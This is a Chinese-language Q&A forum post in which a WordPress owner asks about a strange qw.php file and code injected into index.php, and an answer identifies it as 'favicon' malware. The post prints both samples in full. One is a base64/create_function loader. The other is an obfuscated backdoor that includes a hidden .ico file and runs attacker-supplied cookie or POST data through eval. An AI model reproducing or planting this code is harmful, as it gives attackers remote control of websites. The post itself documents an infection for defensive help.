安装根目录上的WordPress qw.php文件

时间:2019-02-12 16:41:19

标签: php wordpress malware

我在这里发布内容不仅是为了获得有关此特定文件的帮助或指导,而且还有助于搜索此问题。

显然,WordPress的安装根目录有一个名为qw.php的文件,该文件不属于标准安装包。

文件内容如下:

<?php

$alphabet  =  ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string  = "Z2xvYmFsICRhdXRoX3Bhc3MsJGNvbG9yLCRkZWZhdWx0X2FjdGlvbiwkZGVmYXVsdF91$"
$array_name  =  "";
$ar  = array(4,29,34,38,42,9,21,7,38,17,37,7,38);

foreach($ar as $t){
   $array_name .= $alphabet[$t];
}

$a  =  strrev("noi"."tcnuf"."_eta"."erc");
$f  =  $a("", $array_name($string));
$f();

我注意到黑客还将进入文件夹或安装的index.php文件,并将以下php添加到php文件的顶部:

    <?php
/*e5486*/

@include "\057www\055dat\141/AN\110_US\101/pe\164iti\157nhe\162o.o\162g/w\145b/c\157nte\156t/.\066a99\07094c\056ico";

/*e5486*/                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $tc6d63f = 643;$GLOBALS['r15a0'] = Array();global $r15a0;$r15a0 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['fd7e1'] = "\x63\x4a\x52\x51\x67\x5b\x46\x41\x38\x60\x50\x65\x3e\x7b\x54\x64\x2e\x71\x2a\x75\x56\x7e\x66\x2f\x59\x3d\x6c\x76\x79\x22\x58\x37\x6f\x7a\x3b\x68\x70\x42\x6b\x49\x28\x21\x47\x23\x74\x9\x5f\x77\x4c\x6d\x24\x53\x34\x4b\x45\xd\xa\x44\x2d\x31\x61\x5a\x40\x29\x43\x6e\x57\x3a\x72\x36\x4f\x39\x62\x35\x3f\x7d\x4d\x5c\x73\x69\x26\x5e\x2b\x4e\x48\x6a\x30\x2c\x78\x33\x27\x5d\x7c\x32\x55\x20\x3c\x25";$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][22].$r15a0['fd7e1'][69].$r15a0['fd7e1'][22].$r15a0['fd7e1'][71].$r15a0['fd7e1'][73].$r15a0['fd7e1'][0]] = $r15a0['fd7e1'][0].$r15a0['fd7e1'][35].$r15a0['fd7e1'][68];$r15a0[$r15a0['fd7e1'][85].$r15a0['fd7e1'][11].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][59].$r15a0['fd7e1'][52].$r15a0['fd7e1'][11]] = $r15a0['fd7e1'][32].$r15a0['fd7e1'][68].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][88].$r15a0['fd7e1'][11].$r15a0['fd7e1'][31].$r15a0['fd7e1'][31].$r15a0['fd7e1'][52].$r15a0['fd7e1'][72]] = $r15a0['fd7e1'][15].$r15a0['fd7e1'][11].$r15a0['fd7e1'][22].$r15a0['fd7e1'][79].$r15a0['fd7e1'][65].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]] = $r15a0['fd7e1'][78].$r15a0['fd7e1'][44].$r15a0['fd7e1'][68].$r15a0['fd7e1'][26].$r15a0['fd7e1'][11].$r15a0['fd7e1'][65];$r15a0[$r15a0['fd7e1'][17].$r15a0['fd7e1'][71].$r15a0['fd7e1'][11].$r15a0['fd7e1'][93].$r15a0['fd7e1'][73]] = $r15a0['fd7e1'][15].$r15a0['fd7e1'][11].$r15a0['fd7e1'][22].$r15a0['fd7e1'][79].$r15a0['fd7e1'][65].$r15a0['fd7e1'][11].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]] = $r15a0['fd7e1'][79].$r15a0['fd7e1'][65].$r15a0['fd7e1'][79].$r15a0['fd7e1'][46].$r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][44];$r15a0[$r15a0['fd7e1'][88].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][89].$r15a0['fd7e1'][52].$r15a0['fd7e1'][8]] = $r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][79].$r15a0['fd7e1'][60].$r15a0['fd7e1'][26].$r15a0['fd7e1'][79].$r15a0['fd7e1'][33].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][49].$r15a0['fd7e1'][52].$r15a0['fd7e1'][31].$r15a0['fd7e1'][15].$r15a0['fd7e1'][89].$r15a0['fd7e1'][72].$r15a0['fd7e1'][15]] = $r15a0['fd7e1'][36].$r15a0['fd7e1'][35].$r15a0['fd7e1'][36].$r15a0['fd7e1'][27].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][78].$r15a0['fd7e1'][79].$r15a0['fd7e1'][32].$r15a0['fd7e1'][65];$r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][8].$r15a0['fd7e1'][69].$r15a0['fd7e1'][11].$r15a0['fd7e1'][89].$r15a0['fd7e1'][71].$r15a0['fd7e1'][71].$r15a0['fd7e1'][31].$r15a0['fd7e1'][93]] = $r15a0['fd7e1'][19].$r15a0['fd7e1'][65].$r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][79].$r15a0['fd7e1'][60].$r15a0['fd7e1'][26].$r15a0['fd7e1'][79].$r15a0['fd7e1'][33].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][52].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][0].$r15a0['fd7e1'][8].$r15a0['fd7e1'][89].$r15a0['fd7e1'][31]] = $r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][69].$r15a0['fd7e1'][52].$r15a0['fd7e1'][46].$r15a0['fd7e1'][15].$r15a0['fd7e1'][11].$r15a0['fd7e1'][0].$r15a0['fd7e1'][32].$r15a0['fd7e1'][15].$r15a0['fd7e1'][11];$r15a0[$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][72].$r15a0['fd7e1'][72].$r15a0['fd7e1'][73]] = $r15a0['fd7e1'][78].$r15a0['fd7e1'][11].$r15a0['fd7e1'][44].$r15a0['fd7e1'][46].$r15a0['fd7e1'][44].$r15a0['fd7e1'][79].$r15a0['fd7e1'][49].$r15a0['fd7e1'][11].$r15a0['fd7e1'][46].$r15a0['fd7e1'][26].$r15a0['fd7e1'][79].$r15a0['fd7e1'][49].$r15a0['fd7e1'][79].$r15a0['fd7e1'][44];$r15a0[$r15a0['fd7e1'][72].$r15a0['fd7e1'][0].$r15a0['fd7e1'][73].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][11].$r15a0['fd7e1'][71].$r15a0['fd7e1'][15]] = $r15a0['fd7e1'][68].$r15a0['fd7e1'][52].$r15a0['fd7e1'][22].$r15a0['fd7e1'][0].$r15a0['fd7e1'][11].$r15a0['fd7e1'][86].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][19].$r15a0['fd7e1'][52].$r15a0['fd7e1'][71].$r15a0['fd7e1'][72]] = $r15a0['fd7e1'][44].$r15a0['fd7e1'][52].$r15a0['fd7e1'][72].$r15a0['fd7e1'][89].$r15a0['fd7e1'][15];$r15a0[$r15a0['fd7e1'][32].$r15a0['fd7e1'][93].$r15a0['fd7e1'][86].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][22].$r15a0['fd7e1'][31].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8]] = $_POST;$r15a0[$r15a0['fd7e1'][26].$r15a0['fd7e1'][71].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][0]] = $_COOKIE;@$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]]($r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][68].$r15a0['fd7e1'][32].$r15a0['fd7e1'][68].$r15a0['fd7e1'][46].$r15a0['fd7e1'][26].$r15a0['fd7e1'][32].$r15a0['fd7e1'][4], NULL);@$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]]($r15a0['fd7e1'][26].$r15a0['fd7e1'][32].$r15a0['fd7e1'][4].$r15a0['fd7e1'][46].$r15a0['fd7e1'][11].$r15a0['fd7e1'][68].$r15a0['fd7e1'][68].$r15a0['fd7e1'][32].$r15a0['fd7e1'][68].$r15a0['fd7e1'][78], 0);@$r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][60].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][0].$r15a0['fd7e1'][60]]($r15a0['fd7e1'][49].$r15a0['fd7e1'][60].$r15a0['fd7e1'][88].$r15a0['fd7e1'][46].$r15a0['fd7e1'][11].$r15a0['fd7e1'][88].$r15a0['fd7e1'][11].$r15a0['fd7e1'][0].$r15a0['fd7e1'][19].$r15a0['fd7e1'][44].$r15a0['fd7e1'][79].$r15a0['fd7e1'][32].$r15a0['fd7e1'][65].$r15a0['fd7e1'][46].$r15a0['fd7e1'][44].$r15a0['fd7e1'][79].$r15a0['fd7e1'][49].$r15a0['fd7e1'][11], 0);@$r15a0[$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][72].$r15a0['fd7e1'][72].$r15a0['fd7e1'][73]](0);if (!$r15a0[$r15a0['fd7e1'][17].$r15a0['fd7e1'][71].$r15a0['fd7e1'][11].$r15a0['fd7e1'][93].$r15a0['fd7e1'][73]]($r15a0['fd7e1'][7].$r15a0['fd7e1'][48].$r15a0['fd7e1'][2].$r15a0['fd7e1'][54].$r15a0['fd7e1'][7].$r15a0['fd7e1'][57].$r15a0['fd7e1'][24].$r15a0['fd7e1'][46].$r15a0['fd7e1'][2].$r15a0['fd7e1'][94].$r15a0['fd7e1'][83].$r15a0['fd7e1'][46].$r15a0['fd7e1'][89].$r15a0['fd7e1'][69].$r15a0['fd7e1'][69].$r15a0['fd7e1'][60].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][93].$r15a0['fd7e1'][89].$r15a0['fd7e1'][73].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][59].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][22].$r15a0['fd7e1'][59].$r15a0['fd7e1'][59].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][59].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60])){$r15a0[$r15a0['fd7e1'][88].$r15a0['fd7e1'][11].$r15a0['fd7e1'][31].$r15a0['fd7e1'][31].$r15a0['fd7e1'][52].$r15a0['fd7e1'][72]]($r15a0['fd7e1'][7].$r15a0['fd7e1'][48].$r15a0['fd7e1'][2].$r15a0['fd7e1'][54].$r15a0['fd7e1'][7].$r15a0['fd7e1'][57].$r15a0['fd7e1'][24].$r15a0['fd7e1'][46].$r15a0['fd7e1'][2].$r15a0['fd7e1'][94].$r15a0['fd7e1'][83].$r15a0['fd7e1'][46].$r15a0['fd7e1'][89].$r15a0['fd7e1'][69].$r15a0['fd7e1'][69].$r15a0['fd7e1'][60].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][8].$r15a0['fd7e1'][60].$r15a0['fd7e1'][93].$r15a0['fd7e1'][89].$r15a0['fd7e1'][73].$r15a0['fd7e1'][73].$r15a0['fd7e1'][60].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][59].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][22].$r15a0['fd7e1'][59].$r15a0['fd7e1'][59].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][59].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60], 1);$fd2e3658 = NULL;$l055f1e = NULL;$r15a0[$r15a0['fd7e1'][78].$r15a0['fd7e1'][31].$r15a0['fd7e1'][59].$r15a0['fd7e1'][93].$r15a0['fd7e1'][0].$r15a0['fd7e1'][52]] = $r15a0['fd7e1'][73].$r15a0['fd7e1'][52].$r15a0['fd7e1'][22].$r15a0['fd7e1'][31].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][72].$r15a0['fd7e1'][93].$r15a0['fd7e1'][58].$r15a0['fd7e1'][52].$r15a0['fd7e1'][60].$r15a0['fd7e1'][8].$r15a0['fd7e1'][22].$r15a0['fd7e1'][58].$r15a0['fd7e1'][52].$r15a0['fd7e1'][60].$r15a0['fd7e1'][72].$r15a0['fd7e1'][0].$r15a0['fd7e1'][58].$r15a0['fd7e1'][8].$r15a0['fd7e1'][73].$r15a0['fd7e1'][8].$r15a0['fd7e1'][22].$r15a0['fd7e1'][58].$r15a0['fd7e1'][72].$r15a0['fd7e1'][60].$r15a0['fd7e1'][69].$r15a0['fd7e1'][0].$r15a0['fd7e1'][31].$r15a0['fd7e1'][11].$r15a0['fd7e1'][71].$r15a0['fd7e1'][11].$r15a0['fd7e1'][59].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69].$r15a0['fd7e1'][22];global $s712c4;function  t4b3d($fd2e3658, $h0025d){global $r15a0;$abe6301 = "";for ($x3b1d62=0; $x3b1d62<$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]]($fd2e3658);){for ($pb0b59=0; $pb0b59<$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]]($h0025d) && $x3b1d62<$r15a0[$r15a0['fd7e1'][0].$r15a0['fd7e1'][15].$r15a0['fd7e1'][71].$r15a0['fd7e1'][8].$r15a0['fd7e1'][15].$r15a0['fd7e1'][69]]($fd2e3658); $pb0b59++, $x3b1d62++){$abe6301 .= $r15a0[$r15a0['fd7e1'][4].$r15a0['fd7e1'][22].$r15a0['fd7e1'][69].$r15a0['fd7e1'][22].$r15a0['fd7e1'][71].$r15a0['fd7e1'][73].$r15a0['fd7e1'][0]]($r15a0[$r15a0['fd7e1'][85].$r15a0['fd7e1'][11].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][59].$r15a0['fd7e1'][52].$r15a0['fd7e1'][11]]($fd2e3658[$x3b1d62]) ^ $r15a0[$r15a0['fd7e1'][85].$r15a0['fd7e1'][11].$r15a0['fd7e1'][60].$r15a0['fd7e1'][86].$r15a0['fd7e1'][59].$r15a0['fd7e1'][52].$r15a0['fd7e1'][11]]($h0025d[$pb0b59]));}}return $abe6301;}function  r4fce08d($fd2e3658, $h0025d){global $r15a0;global $s712c4;return $r15a0[$r15a0['fd7e1'][19].$r15a0['fd7e1'][52].$r15a0['fd7e1'][71].$r15a0['fd7e1'][72]]($r15a0[$r15a0['fd7e1'][19].$r15a0['fd7e1'][52].$r15a0['fd7e1'][71].$r15a0['fd7e1'][72]]($fd2e3658, $s712c4), $h0025d);}foreach ($r15a0[$r15a0['fd7e1'][26].$r15a0['fd7e1'][71].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][60].$r15a0['fd7e1'][0]] as $h0025d=>$n9121){$fd2e3658 = $n9121;$l055f1e = $h0025d;}if (!$fd2e3658){foreach ($r15a0[$r15a0['fd7e1'][32].$r15a0['fd7e1'][93].$r15a0['fd7e1'][86].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][22].$r15a0['fd7e1'][31].$r15a0['fd7e1'][72].$r15a0['fd7e1'][8]] as $h0025d=>$n9121){$fd2e3658 = $n9121;$l055f1e = $h0025d;}}$fd2e3658 = @$r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][8].$r15a0['fd7e1'][69].$r15a0['fd7e1'][11].$r15a0['fd7e1'][89].$r15a0['fd7e1'][71].$r15a0['fd7e1'][71].$r15a0['fd7e1'][31].$r15a0['fd7e1'][93]]($r15a0[$r15a0['fd7e1'][72].$r15a0['fd7e1'][0].$r15a0['fd7e1'][73].$r15a0['fd7e1'][93].$r15a0['fd7e1'][22].$r15a0['fd7e1'][11].$r15a0['fd7e1'][71].$r15a0['fd7e1'][15]]($r15a0[$r15a0['fd7e1'][35].$r15a0['fd7e1'][52].$r15a0['fd7e1'][52].$r15a0['fd7e1'][15].$r15a0['fd7e1'][0].$r15a0['fd7e1'][8].$r15a0['fd7e1'][89].$r15a0['fd7e1'][31]]($fd2e3658), $l055f1e));if (isset($fd2e3658[$r15a0['fd7e1'][60].$r15a0['fd7e1'][38]]) && $s712c4==$fd2e3658[$r15a0['fd7e1'][60].$r15a0['fd7e1'][38]]){if ($fd2e3658[$r15a0['fd7e1'][60]] == $r15a0['fd7e1'][79]){$x3b1d62 = Array($r15a0['fd7e1'][36].$r15a0['fd7e1'][27] => @$r15a0[$r15a0['fd7e1'][49].$r15a0['fd7e1'][52].$r15a0['fd7e1'][31].$r15a0['fd7e1'][15].$r15a0['fd7e1'][89].$r15a0['fd7e1'][72].$r15a0['fd7e1'][15]](),$r15a0['fd7e1'][78].$r15a0['fd7e1'][27] => $r15a0['fd7e1'][59].$r15a0['fd7e1'][16].$r15a0['fd7e1'][86].$r15a0['fd7e1'][58].$r15a0['fd7e1'][59],);echo @$r15a0[$r15a0['fd7e1'][88].$r15a0['fd7e1'][60].$r15a0['fd7e1'][31].$r15a0['fd7e1'][89].$r15a0['fd7e1'][52].$r15a0['fd7e1'][8]]($x3b1d62);}elseif ($fd2e3658[$r15a0['fd7e1'][60]] == $r15a0['fd7e1'][11]){eval/*k59bce*/($fd2e3658[$r15a0['fd7e1'][15]]);}exit();}} ?>

添加到服务器安装根目录的其他文件:article59.phpdir44.phponxwylrq.php

有人对这与恶意软件有什么关系有何想法?有谁知道该文件从被黑插件或主题位置方面连接了什么?

1 个答案:

答案 0 :(得分:1)

您的网站似乎已被favicon木马感染,因为该脚本的第一行评估为:

@include "/www-data/ANH_USA/petitionhero.org/web/content/.6a99894c.ico"
  

favicon(.ico)恶意软件创建流氓favicon.ico或随机.ico   其中包含恶意PHP代码的文件。这个恶意的PHP   已知代码会在网站上执行危险的操作,例如URL   注入,在WordPress / Drupal中创建管理员帐户,   安装间谍软件/特洛伊木马,创建网络钓鱼页面等。

查看更多详细信息here